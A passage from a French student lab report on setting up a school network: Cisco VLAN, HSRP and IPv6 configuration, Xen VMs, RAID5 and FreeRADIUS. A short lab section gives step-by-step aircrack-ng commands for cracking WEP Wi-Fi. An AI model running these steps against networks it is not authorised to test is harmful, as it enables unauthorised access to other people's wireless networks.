 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
